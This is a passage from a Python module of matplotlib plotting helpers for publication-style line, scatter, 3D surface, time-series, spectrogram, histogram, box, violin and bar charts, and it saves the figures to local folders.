amount of width reserved for blank space between subplots\nmpl.rcParams['figure.subplot.hspace'] = 0.2 # the amount of height reserved for white space between subplots\n\n# SAVEFIG\nmpl.rcParams['savefig.dpi'] = 600 # figure dots per inch\nmpl.rcParams['savefig.format'] = 'svg' # png, ps, pdf, svg\n\n# To generically create multiple plots\nplot_linestyle = ['-','--','-.',':']\n\nmarker_weight = [30,60,40,40]\nplot_markerstyle = ['o','x','v','^']\n\ndef set_lims(ax,X,Y,xmin,xmax,ymin,ymax):\n \n if xmax == 0.:\n xmax += 0.3\n\n # Determine the lower and upper bounds of the horizontal axis\n if xmax == None:\n xmax = np.amax(X)\n if xmin == None:\n xmin = np.amin(X)\n\n # Set the limits of the plot\n plt.xlim(xmin, xmax)\n\n if not isinstance(ymax,np.ndarray):\n # Set the window limits\n plt.ylim(np.amin(Y) - ymin * abs(np.amin(Y)),\n np.amax(Y) + ymax * abs(np.amax(Y)-np.amin(Y)))\n else:\n plt.ylim(ymin[0],ymax[0])\n\n# Container for all plots\ndef generate_plot(\n X,Y,labels,xlabel,ylabel,\n plot_type = 'Plot',\n ymax = 0.1, \n ymin = 0.1,\n xmax = None,\n xmin = None,\n tick_increment = None,\n showplot = False,\n save_plot = False,\n log_y = False,\n log_x = False,\n transparent = False,\n grid = False, \n folder = None,\n filename = 'Plot',\n num_col = 2,\n legend_loc = 'upper right',\n experimental_args = None,\n xlabelpad = 5, \n hide_origin = False, \n for_notebook=False,\n template='publication',\n file_type='pdf'\n ): \n '''\n This is a function which accepts a series of data and plots it based on preset defaults\n as well as user-defined, custom inputs.\n \n Creator : Daniel Newman - Danielnewman09@gmail.com\n \n Mandatory Inputs:\n X - x-coordinate of the plot\n Y - y-coordinates of the plot. Must have an axis of the same length as X\n labels - list of strings which form the labels we will use for the legend\n xlabel - Label along the X-axis\n ylabel - Label along the Y-axis\n \n Optional Inputs:\n plot_type - String indicating the type of plot\n ymax - multiplicative value for the maximum Y value\n ymin - multiplicative value for the minimum Y value\n xmax - maximum X value\n xmin - minimum X value\n tick_increment - spacing between y-axis ticks\n showplot - boolean indicating whether the plot is displayed\n log_y - boolean indicating whether the y-axis should be on a log scale\n transparent - boolean indicating whether to save a transparent .png\n grid - boolean indicating whether to show the grid\n folder - subfolder in which to save the figure\n filename - string indicating the name of the saved file\n num_col - number of columns in the legend\n legend_loc - string indicating the location of the legend\n experimental_args - experimental values to show on the plot\n xlabelpad - spacing between the x-axis and the x-label\n '''\n \n if template.lower() == 'large':\n plt.figure(figsize=(10,6.67))\n elif template.lower() == 'wide':\n plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n plt.figure(figsize=(9,6))\n elif template.lower() == 'presentation-wide':\n plt.figure(figsize=(12,6))\n else:\n plt.figure()\n\n # Customize the axes\n ax = plt.gca()\n \n # Make sure the Y data is at least 2-D\n Y = np.atleast_2d(Y)\n \n # Ensure the compatibility of the X and Y data\n if Y.shape[0] != X.shape[0] and Y.shape[1] != X.shape[0]:\n raise ValueError(\n '''The Shape of X, [{}], is not compatible \n with the shape of Y, [{}]...\\n Exiting'''\n .format(X.shape,Y.shape))\n return \n elif Y.shape[0] != X.shape[0]: \n Y = Y.T\n\n if Y.shape[1] != len(labels):\n raise ValueError('Please ensure the number of legend labels matches the number of data plots.')\n \n if plot_type.lower() == 'plot':\n # Plot all of the available data\n for i in np.arange(0,len(labels)):\n\n if labels[i].lower() == 'vtol':\n plt.plot(X, Y[:,i],\n label=r'$V_{tol}$',\n color='k',\n linestyle=plot_linestyle[1], # Linestyle given from array at the beginning of this document\n linewidth=1)\n elif 'sigma' in labels[i].lower():\n plt.plot(X, Y[:,i],\n label=r'\\textbf{' + labels[i] + '}',\n color='k',\n linestyle=plot_linestyle[1], # Linestyle given from array at the beginning of this document\n linewidth=2)\n else:\n if log_y:\n plt.semilogy(X, Y[:,i],\n label=r'\\textbf{' + labels[i] + '}',\n linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n linewidth=2) \n else:\n plt.plot(X, Y[:,i],\n label=r'\\textbf{' + labels[i] + '}',\n linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n linewidth=2) \n\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n\n if tick_increment is not None:\n loc = mtick.MultipleLocator(base=tick_increment) # this locator puts ticks at regular intervals\n ax.yaxis.set_major_locator(loc)\n \n\n set_lims(ax,X,Y,xmin,xmax,ymin,ymax)\n \n\n # Show the grid, if desired\n ax.grid(grid)\n\n ax.set_axisbelow(True)\n\n # If we want to plot experimental data\n if experimental_args is not None: \n\n data,positions = experimental_args\n\n if len(np.atleast_2d(data)[:,0]) > 1:\n\n # This code is for closely grouped experimental data that doesn't ened a box and whisker plot\n means = np.average(data,axis=0)\n maxes = np.amax(data,axis=0)\n mins = np.amin(data,axis=0)\n else:\n means = data\n maxes = data\n mins = data\n\n plt.errorbar(positions,means,yerr=[maxes-means,means-mins],fmt='D', \n ecolor='C1',mfc='C1',mec='C1',capsize=5, capthick=1,lw=1,label='Experimental'\n )\n\n elif plot_type.lower() == 'scatter': \n for i in range(0,len(labels)):\n plt.scatter(X[:,i], Y[:,i],\n label= '{}'.format(labels[i]),s=marker_weight[i],#facecolors='none',#edgecolors='k',\n marker=plot_markerstyle[i], # Linestyle given from array at the beginning of this document\n linewidth=2) \n \n set_lims(X,Y,xmin,xmax,ymin,ymax,log_y,log_x)\n plt.margins(1)\n \n #ax.spines['left'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_label_position('right')\n ax.yaxis.set_ticks_position('right')\n\n # set the x-spine (see below for more info on `set_position`)\n ax.spines['right'].set_position('zero')\n\n # turn off the right spine/ticks\n ax.spines['left'].set_color('none')\n ax.yaxis.tick_right()\n\n # set the y-spine\n ax.spines['bottom'].set_position('zero')\n\n # turn off the top spine/ticks\n ax.spines['top'].set_color('none')\n ax.xaxis.tick_bottom()\n \n else:\n raise ValueError('Invalid plot_type value. Please provide a valid plot type')\n\n if not log_y:\n # X tick locations\n xloc = mtick.MaxNLocator(\n nbins=7, # Maximum number of bins\n steps = [1 , 2, 2.5, 5, 10], # valid step increments\n prune='both').tick_values(*plt.xlim()) \n\n # Y tick locations\n yloc = mtick.MaxNLocator(\n nbins=6, # Maximum number of bins\n steps = [1, 2, 2.5, 5, 10], # valid step increments\n prune='upper').tick_values(*plt.ylim())\n\n if hide_origin:\n # Hide the origin\n yloc = yloc[np.argwhere(yloc != 0.)]\n xloc = xloc[np.argwhere(xloc != 0.)]\n\n # Set the tickmarks at the given x and y locations\n ax.set_xticks(xloc)\n ax.set_yticks(yloc)\n \n if labels[0]:\n # Show the legend\n ax.legend(ncol=num_col,loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n \n # Create the axis labels\n plt.xlabel(r'\\textbf{' + xlabel + '}', labelpad=xlabelpad)\n plt.ylabel(r'\\textbf{' + ylabel + '}', labelpad=5)\n\n # Adjust the page layout filling the page using the new tight_layout command\n plt.tight_layout(pad=1.2) \n\n if save_plot:\n if folder is not None:\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filename = folder + '/' + filename\n\n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n\n if showplot:\n plt.show()\n\n # Clear the axes and figure\n plt.clf()\n plt.cla()\n plt.close()\n\ndef plot_3d(\n X,Y,Z,\n xlabel,ylabel,zlabel,\n azimuth=225,elevation=30,\n showplot=True,\n save_plot=False,\n folder='Figures/Miscellaneous',\n filename='3d_plot',\n xticks=1,yticks=1,zticks=1,\n enablelog=False,\n labelsize=24,\n labelpad=20,\n rotated=False,\n transparent=False,\n file_type='pdf'):\n '''\n Plot data in three dimensions\n\n Creator : Daniel Newman - Danielnewman09@gmail.com\n \n Mandatory Inputs:\n X - x-coordinate of the plot\n Y - y-coordinates of the plot\n Z - z-coordinates of the plot\n xlabel - Label along the X-axis\n ylabel - Label along the Y-axis\n zlabel - Label along the Z-axis\n \n Optional Inputs:\n azimuth - rotation of the plot about the z axis\n elevation - vertical rotation of the plot\n tick_increment - spacing between y-axis ticks\n showplot - boolean indicating whether the plot is displayed\n rotated - boolean indicating whether the axis labels are rotated\n transparent - boolean indicating whether to save a transparent .png\n folder - subfolder in which to save the figure\n filename - string indicating the name of the saved file \n '''\n\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n # Create the figure\n fig = plt.figure(figsize=(10,6.67))\n plt.subplots_adjust(bottom=0.17,left=0.17,top=0.96,right=0.96)\n ax1 = Axes3D(fig)\n ax1.view_init(elevation,azimuth)\n\n ax1.xaxis.set_major_locator(mtick.MultipleLocator(xticks))\n ax1.yaxis.set_major_locator(mtick.MultipleLocator(yticks))\n\n multipliers = {\n r'$(\\times 10^{9})$': 1e-9,\n r'$(\\times 10^{6})$': 1e-6,\n r'$(\\times 10^{3})$': 1e-3,\n r'$(\\times 10^{-3})$': 1e3,\n r'$(\\times 10^{-6})$': 1e6,\n r'$(\\times 10^{-9})$': 1e9,\n }\n\n if np.abs(np.amax(Z)) < 0.01 or np.abs(np.amin(Z)) > 1000:\n\n thisKey = ''\n thisValue = 1\n\n for key,value in multipliers.items():\n if (np.abs(np.amax(Z)) * value) // 1e3 < 1:\n thisKey = key\n thisValue = value\n\n zlabel += ' ' + thisKey\n Z *= thisValue\n\n\n # format the tick labels\n plt.setp(ax1.get_ymajorticklabels(), family='serif',fontsize=22)\n plt.setp(ax1.get_xmajorticklabels(), family='serif',fontsize=22)\n plt.setp(ax1.get_zmajorticklabels(), family='serif',fontsize=22)\n\n # Put a grid in the background\n ax1.grid(True)\n ax1.xaxis.pane.set_edgecolor('black')\n ax1.yaxis.pane.set_edgecolor('black')\n\n # Let the background of the plot be white\n ax1.xaxis.pane.fill = False\n ax1.yaxis.pane.fill = False\n ax1.zaxis.pane.fill = False\n\n if 200 < azimuth < 240 or 20 < azimuth < 60:\n # adjusts the padding around the 3D plot\n ax1.dist = 11\n\n # Format the ticks\n ax1.xaxis._axinfo['tick']['inward_factor'] = 0\n ax1.xaxis._axinfo['tick']['outward_factor'] = 0.4\n ax1.yaxis._axinfo['tick']['inward_factor'] = 0\n ax1.yaxis._axinfo['tick']['outward_factor'] = 0.4\n ax1.zaxis._axinfo['tick']['inward_factor'] = 0\n ax1.zaxis._axinfo['tick']['outward_factor'] = 0.4\n\n # Vertically and horizontally align the tick labels\n [t.set_va('center') for t in ax1.get_yticklabels()]\n [t.set_ha('right') for t in ax1.get_yticklabels()]\n [t.set_va('top') for t in ax1.get_xticklabels()]\n [t.set_ha('center') for t in ax1.get_xticklabels()]\n [t.set_va('top') for t in ax1.get_zticklabels()]\n [t.set_ha('center') for t in ax1.get_zticklabels()]\n\n else:\n raise ValueError('The specified viewing angle is likely to yield suboptimal results. '\n 'Please choose an azimuth between (200,240) or (20,60).')\n # The tick locations and axis labels are aligned based on being viewed from a certain\n # angle. If you NEED to view the plot from a different angle, you will have to update this\n # alignment. \n\n # Create a linear grid for x and y\n yi = np.linspace(min(Y), max(Y))\n xi = np.linspace(min(X), max(X))\n\n # Interpolate the Z data based on the X and Y grid\n Z = griddata((X, Y), Z, (xi[None,:], yi[:,None]), method='cubic')\n X, Y = np.meshgrid(xi, yi)\n\n if np.any(np.isnan(Z)):\n ax1.scatter(X, Y, Z) \n plt.show()\n raise ValueError('The requested values cannot be shown as a smooth surface. \\n'\n 'Please double-check your data. Generating point cloud of \\n '\n 'requested values...')\n\n\n else:\n # Plot the surface data\n surf = ax1.plot_surface(\n X, Y, Z, \n rstride=1, linewidth=0, alpha=0.85, \n cstride=1,cmap=cm.bwr, shade=False, antialiased=True)\n\n # Format the color bar\n color_bar = plt.colorbar(surf,shrink=0.5,aspect=8,pad=0.)\n cbytick_obj = plt.getp(color_bar.ax.axes, 'yticklabels')\n plt.setp(cbytick_obj, family='serif',fontsize=22)\n\n # Set the Z limits\n ax1.set_zlim3d(np.min(Z), np.max(Z))\n\n # Determine whether the axis labels are rotated\n ax1.zaxis.set_rotate_label(False) # disable automatic rotation\n ax1.xaxis.set_rotate_label(rotated) \n ax1.yaxis.set_rotate_label(rotated) \n\n # Set the axis labels\n ax1.set_xlabel(xlabel,family='serif',fontsize=labelsize,labelpad=labelpad)\n ax1.set_ylabel(ylabel,family='serif',fontsize=labelsize,labelpad=labelpad)\n ax1.set_zlabel(zlabel,family='serif',fontsize=labelsize,labelpad=15,rotation=90)\n \n\n if save_plot:\n if folder is not None:\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filename = folder + '/' + filename\n\n # Save the pdf of the plot \n if transparent:\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n\n if showplot:\n plt.show()\n\n plt.clf()\n plt.cla()\n plt.close()\n \ndef timedelta_helper(timeValues,timeUnit):\n \n timeValues = timeValues.flatten().tolist()\n startTime = timeValues[0]\n \n if timeUnit.lower() == 'minutes':\n timeDivisor = 60\n elif timeUnit.lower() == 'hours':\n timeDivisor = 60 * 60\n elif timeUnit.lower() == 'days':\n timeDivisor = 60 * 60 * 24\n elif timeUnit.lower() == 'weeks':\n timeDivisor = 60 * 60 * 24 * 7\n \n timeValues = [(timeValues[i] - startTime).total_seconds()/timeDivisor for i in range(len(timeValues))]\n \n timeValues = np.array(timeValues)\n \n return timeValues\n\nclass MyFormatter(Formatter):\n def __init__(self, dates, fmt='%Y-%m-%d'):\n self.dates = dates\n self.fmt = r'\\textbf{' + fmt + '}'\n\n def __call__(self, x, pos=0):\n 'Return the label for time x at position pos'\n ind = int(np.round(x))\n if ind >= len(self.dates) or ind < 0:\n return ''\n return self.dates[ind].strftime(self.fmt)\ndef plot_timeseries(\n time,Y,labels,xlabel,ylabel,\n plot_type = 'Plot',\n ymax = 0.1, \n ymin = 0.1,\n xmax = None,\n xmin = None,\n tick_increment = None,\n showplot = False,\n save_plot = False,\n log_y = False,\n log_x = False,\n transparent = False,\n grid = False, \n folder = None,\n filename = 'Plot',\n num_col = 2,\n legend_loc = 'upper right',\n experimental_args = None,\n xlabelpad = 5, \n hide_origin = False, \n template='publication',\n file_type='pdf',\n date_format='%Y-%m-%d'\n ): \n '''\n This is a function which accepts a series of data and plots it based on preset defaults\n as well as user-defined, custom inputs.\n \n Creator : Daniel Newman - Danielnewman09@gmail.com\n \n Mandatory Inputs:\n X - x-coordinate of the plot\n Y - y-coordinates of the plot. Must have an axis of the same length as X\n labels - list of strings which form the labels we will use for the legend\n xlabel - Label along the X-axis\n ylabel - Label along the Y-axis\n \n Optional Inputs:\n plot_type - String indicating the type of plot\n ymax - multiplicative value for the maximum Y value\n ymin - multiplicative value for the minimum Y value\n xmax - maximum X value\n xmin - minimum X value\n tick_increment - spacing between y-axis ticks\n showplot - boolean indicating whether the plot is displayed\n log_y - boolean indicating whether the y-axis should be on a log scale\n transparent - boolean indicating whether to save a transparent .png\n grid - boolean indicating whether to show the grid\n folder - subfolder in which to save the figure\n filename - string indicating the name of the saved file\n num_col - number of columns in the legend\n legend_loc - string indicating the location of the legend\n experimental_args - experimental values to show on the plot\n xlabelpad - spacing between the x-axis and the x-label\n '''\n\n formatter = MyFormatter(time,fmt=date_format)\n\n if template.lower() == 'large':\n plt.figure(figsize=(10,6.67))\n elif template.lower() == 'wide':\n plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n plt.figure(figsize=(9,6))\n elif template.lower() == 'presentation-wide':\n plt.figure(figsize=(12,6))\n else:\n plt.figure(figsize=(6,4))\n\n # Customize the axes\n ax = plt.gca()\n fig = plt.gcf()\n \n # Make sure the Y data is at least 2-D\n Y = np.atleast_2d(Y)\n \n # Ensure the compatibility of the X and Y data\n if Y.shape[0] != time.shape[0] and Y.shape[1] != time.shape[0]:\n raise ValueError(\n '''The Shape of X, [{}], is not compatible \n with the shape of Y, [{}]...\\n Exiting'''\n .format(time.shape,Y.shape))\n return \n elif Y.shape[0] != time.shape[0]: \n Y = Y.T\n\n if Y.shape[1] != len(labels):\n raise ValueError('Please ensure the number of legend labels matches the number of data plots.')\n \n ax.xaxis.set_major_formatter(formatter)\n\n # Plot all of the available data\n for i in np.arange(0,len(labels)):\n\n if 'sigma' in labels[i].lower():\n control_chart = True\n plt.plot(np.arange(Y.shape[0]), Y[:,i],\n label=r'\\textbf{' + labels[i] + '}',\n color='k',\n linestyle=plot_linestyle[1], # Linestyle given from array at the beginning of this document\n linewidth=2)\n else:\n if log_y:\n plt.semilogy(np.arange(Y.shape[0]), Y[:,i],\n label=r'\\textbf{' + labels[i] + '}',\n linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n linewidth=2) \n else:\n plt.plot(np.arange(Y.shape[0]), Y[:,i],\n label=r'\\textbf{' + labels[i] + '}',\n linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n linewidth=2) \n\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n fig.autofmt_xdate()\n\n if tick_increment is not None:\n loc = mtick.MultipleLocator(base=tick_increment) # this locator puts ticks at regular intervals\n ax.yaxis.set_major_locator(loc)\n\n if not isinstance(ymax,np.ndarray):\n # Set the window limits\n plt.ylim(np.amin(Y) - ymin * abs(np.amin(Y)),\n np.amax(Y) + ymax * abs(np.amax(Y)-np.amin(Y)))\n else:\n plt.ylim(ymin[0],ymax[0])\n\n # Show the grid, if desired\n ax.grid(grid)\n\n ax.set_axisbelow(True)\n \n\n\n if not log_y:\n # X tick locations\n xloc = mtick.MaxNLocator(\n nbins=7, # Maximum number of bins\n steps = [1 , 2, 2.5, 5, 10], # valid step increments\n prune='both').tick_values(*plt.xlim()) \n\n # Y tick locations\n yloc = mtick.MaxNLocator(\n nbins=6, # Maximum number of bins\n steps = [1, 2, 2.5, 5, 10], # valid step increments\n prune='upper').tick_values(*plt.ylim())\n\n # Set the tickmarks at the given x and y locations\n ax.set_xticks(xloc)\n ax.set_yticks(yloc)\n \n if labels[0]:\n # Show the legend\n ax.legend(ncol=num_col,loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n \n # Create the axis labels\n plt.xlabel(r'\\textbf{' + xlabel + '}', labelpad=xlabelpad)\n plt.ylabel(r'\\textbf{' + ylabel + '}', labelpad=5)\n\n # Adjust the page layout filling the page using the new tight_layout command\n plt.tight_layout(pad=1.2) \n\n if save_plot:\n if folder is not None:\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filename = folder + '/' + filename\n\n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename),transparent=transparent,facecolor=None) \n\n if showplot:\n plt.show()\n\n # Clear the axes and figure\n plt.clf()\n plt.cla()\n plt.close()\n \ndef plot_spectrogram(\n time,\n spectrogram,\n frequencyInterval,\n size=(12,4),\n showplot = False,\n save_plot = False,\n transparent = False,\n folder = None,\n filename = 'Spectrogram',\n xlabelpad = 5, \n ylabelpad = 5, \n file_type='pdf',\n date_format='%I:00 %p, %b %d'\n ):\n\n yi = np.arange(-0.0, spectrogram.shape[1] * frequencyInterval,frequencyInterval)\n xi = np.arange(0.0,spectrogram.shape[0])\n X, Y = np.meshgrid(xi, yi)\n plt.figure(figsize=size)\n\n # Customize the axes\n ax = plt.gca()\n plt.pcolormesh(X,Y,spectrogram,cmap='cividis',norm=colors.LogNorm(vmin=np.amin(spectrogram),vmax=np.amax(spectrogram)))\n\n formatter = MyFormatter(time,fmt=date_format)\n ax.xaxis.set_major_formatter(formatter)\n ax.tick_params(labelsize=18)\n\n plt.colorbar()\n\n plt.ylabel(r'\\textbf{Frequency (Hz)}', labelpad=ylabelpad,fontsize=22)\n plt.xlabel(r'\\textbf{Time}', labelpad=xlabelpad,fontsize=22)\n\n plt.tight_layout(pad=1.2)\n\n if save_plot:\n if folder is not None:\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filename = folder + '/' + filename\n\n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n\n if showplot:\n plt.show()\n\n # Clear the axes and figure\n plt.clf()\n plt.cla()\n plt.close()\n \ndef plot_normaltest(data,xlabel,ylabel,filename,folder='figures',transparent=True,file_type='png'):\n \n from scipy.stats import probplot\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n res = probplot(data, plot=ax)\n ax.set_title(\"\")\n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n filename = folder + '/' + filename\n \n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n \n plt.show()\n\ndef plot_histogram(data,labels,xlabel,ylabel,filename,template='publication',ymax=0,\n folder='figures',transparent=True,file_type='png',num_col = 2,legend_loc='best',nbins=20):\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n if template.lower() == 'publication':\n plt.figure(figsize=(6,4))\n else:\n plt.figure(figsize=(12,4))\n \n data = np.atleast_2d(data)\n \n if data.shape[0] > data.shape[1]:\n data = data.T\n \n colors = ['#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628']\n \n ax = plt.gca()\n \n max_y = 0.\n \n # the histogram of the data\n for i in range(data.shape[0]):\n n, bins, patches = plt.hist(data[i,:], nbins, density=True, facecolor=colors[i], alpha=0.90,label=labels[i])\n \n if np.amax(n) > max_y:\n max_y = np.amax(n)\n\n ax.legend(ncol=num_col,loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n \n plt.ylim(0,max_y + ymax)\n\n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n plt.grid(False)\n \n filename = folder + '/' + filename\n \n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n \n plt.show()\n \n\ncolors = ['#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628']\n\ndef box_plot_compare(data,labels,\n xlabel='',ylabel='Latency (ms)',log_y=False,\n folder='figures',filename='boxplot',savefig=False,\n transparent=True,color_order=np.arange(len(colors)),template='publication',\n xtickpad=5,showfliers=False,legend_loc='best',max_cutoff=0,min_cutoff=0,plot_type='violin',extension='png',inferenceLocations=None):\n thisColors = [colors[i] for i in color_order]\n if template.lower() == 'publication':\n fig = plt.figure(figsize=(6,4))\n elif template.lower() == 'wide':\n fig = plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n fig = plt.figure(figsize=(9,6))\n else:\n fig = plt.figure()\n \n position = [i+1 for i in range(data.shape[1])]\n tickPositions = []\n phantomLines = []\n \n for i in range(data.shape[-1]):\n \n max_index = data.shape[0] - max_cutoff\n min_index = min_cutoff\n \n thisData = np.sort(data[...,i],axis=0)[min_index:max_index,:]\n \n if plot_type=='violin':\n\n violin_parts = plt.violinplot(thisData,\n positions = position,\n showmeans=False,\n showmedians=False,\n showextrema=False)\n\n for counter, pc in enumerate(violin_parts['bodies']):\n pc.set_facecolor(colors[counter])\n pc.set_edgecolor('black')\n pc.set_alpha(1)\n\n if i == 0:\n line, = plt.plot([1,1],color=colors[counter])\n phantomLines.append(line)\n \n else:\n \n bp = plt.boxplot(thisData,\n positions=position,\n showfliers=showfliers,\n patch_artist=True,\n meanline=False,\n notch=False,\n medianprops={'color':'black',\n 'linewidth':2},\n whiskerprops={'linewidth':2},\n capprops={'linewidth':2},\n widths=0.75)\n \n for counter,patch in enumerate(bp['boxes']):\n # change outline color\n patch.set(color=colors[counter], linewidth=2)\n patch.set_facecolor(colors[counter])\n \n if i == 0:\n line, = plt.plot([1,1],color=colors[counter])\n phantomLines.append(line)\n \n tickPositions.append(np.mean(position)) \n position = [position[i] + data.shape[1] + 1 for i in range(len(position))]\n \n ax = plt.gca()\n\n if log_y == True:\n ax.set_yscale('log')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n ax.set_xticklabels([r'\\textbf{' + label + '}' for label in labels])\n ax.set_xticks(tickPositions)\n ax.tick_params(axis='x', which='major', pad=xtickpad)\n ax.legend(tuple(phantomLines),tuple(inferenceLocations),loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n \n [phantomLines[i].set_visible(False) for i in range(len(phantomLines))]\n \n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n plt.tight_layout(pad=1.5)\n \n if savefig:\n plt.savefig(folder + '/' + filename + '.' + extension,transparent=transparent)\n\n plt.show()\n\n\ndef bar_chart_compare(data,labels,dataLabels,\n xlabel='',ylabel='Latency (ms)',log_y=False,\n folder='figures',filename='boxplot',savefig=False,\n transparent=True,color_order=np.arange(len(colors)),template='publication',max_cutoff=0,min_cutoff=0,\n xtickpad=5,showfliers=False,legend_loc='best',extension='png'):\n thisColors = [colors[i] for i in color_order]\n if template.lower() == 'publication':\n fig = plt.figure(figsize=(6,4))\n elif template.lower() == 'wide':\n fig = plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n fig = plt.figure(figsize=(9,6))\n else:\n fig = plt.figure()\n \n x = np.arange(data.shape[-1])\n tickPositions = x.tolist() \n phantomLines = []\n width = .7 / len(dataLabels)\n \n means = np.mean(data,axis=0)\n stdev = np.std(data,axis=0)\n\n\n for j in range(data.shape[-2]):\n\n plt.bar(x - 0.35 + (j+.5) * width, means[j,:], width, label=r'\\textbf{' + dataLabels[j] + '}')\n\n# tickPositions.append(np.mean(position)) \n# position = [position[i] + data.shape[1] + 1 for i in range(len(position))]\n \n ax = plt.gca()\n\n if log_y == True:\n ax.set_yscale('log')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n ax.set_xticklabels([r'\\textbf{' + label + '}' for label in labels])\n ax.set_xticks(tickPositions)\n ax.tick_params(axis='x', which='major', pad=xtickpad)\n# ax.legend(tuple(phantomLines),tuple(dataLabels),loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n plt.legend(loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n \n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n plt.tight_layout(pad=1.5)\n \n if savefig:\n plt.savefig(folder + '/' + filename + '.' + extension,transparent=transparent)\n\n plt.show()\n \n\ndef box_plot(data,labels,ylabel='Latency (ms)',log_y=False,\n folder='figures',filename='boxplot',savefig=False,\n transparent=True,color_order=np.arange(len(colors)),\n template='publication',title=''):\n thisColors = [colors[i] for i in color_order]\n if template.lower() == 'publication':\n fig = plt.figure(figsize=(6,4))\n elif template.lower() == 'wide':\n fig = plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n fig = plt.figure(figsize=(9,6))\n else:\n fig = plt.figure()\n # Create an axes instance\n# ax = fig.add_axes([0,0,1,1])\n # Create the boxplot\n bp = plt.boxplot(data,\n showfliers=False,\n patch_artist=True,\n meanline=False,\n notch=False,\n medianprops={'color':'black',\n 'linewidth':2},\n whiskerprops={'linewidth':2},\n capprops={'linewidth':2})\n ax = plt.gca()\n \n for patch, color in zip(bp['boxes'], thisColors):\n # change outline color\n patch.set(color=color, linewidth=2)\n\n patch.set_facecolor(color)\n\n if log_y == True:\n ax.set_yscale('log')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n ax.set_title(r'\\textbf{' + title + '}',fontsize=22)\n\n ax.set_xticklabels([r'\\textbf{' + label + '}' for label in labels])\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n 